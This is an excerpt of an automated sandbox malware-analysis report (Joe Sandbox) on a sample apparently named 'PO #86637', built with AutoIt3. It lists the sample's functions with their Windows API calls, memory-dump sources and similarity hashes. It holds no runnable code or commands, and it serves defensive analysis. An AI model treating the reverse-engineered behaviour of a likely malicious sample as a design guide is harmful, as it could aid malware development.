                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                      • LineTo.GDI32(?,?,?), ref: 00447326
                      • EndPath.GDI32(?), ref: 00447336
                      • StrokePath.GDI32(?), ref: 00447344
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                      • String ID:
                      • API String ID: 2783949968-0
                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                      Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                      Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                      • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                      • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                      • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                      Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      • GetDesktopWindow.USER32 ref: 00472B63
                      • GetDC.USER32(00000000), ref: 00472B6C
                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                      Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      • GetDesktopWindow.USER32 ref: 00472BB2
                      • GetDC.USER32(00000000), ref: 00472BBB
                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                      Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                      Download Yara Rule
                      APIs
                      • __getptd_noexit.LIBCMT ref: 00415150
                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                      • __freeptd.LIBCMT ref: 0041516B
                      • ExitThread.KERNEL32 ref: 00415173
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                      • String ID:
                      • API String ID: 1454798553-0
                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                      Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _strncmp
                      • String ID: Q\E
                      • API String ID: 909875538-2189900498
                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                      Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                      Download Yara Rule
                      APIs
                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                      • String ID: AutoIt3GUI$Container
                      • API String ID: 2652923123-3941886329
                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                      Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove_strncmp
                      • String ID: U$\
                      • API String ID: 2666721431-100911408
                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                      Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • __wcsnicmp.LIBCMT ref: 00467288
                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                      • String ID: LPT
                      • API String ID: 3035604524-1350329615
                      • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                      • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                      Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: \$h
                      • API String ID: 4104443479-677774858
                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                      Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID: &
                      • API String ID: 2931989736-1010288
                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                      Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: \
                      • API String ID: 4104443479-2967466578
                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                      Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00466825
                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CrackInternet_wcslen
                      • String ID: |
                      • API String ID: 596671847-2343686810
                      • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                      • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                      • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                      • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                      Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: '
                      • API String ID: 3850602802-1997036262
                      • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                      • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                      • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                      • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                      Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      • _strlen.LIBCMT ref: 0040F858
                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                        • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                      • _sprintf.LIBCMT ref: 0040F9AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
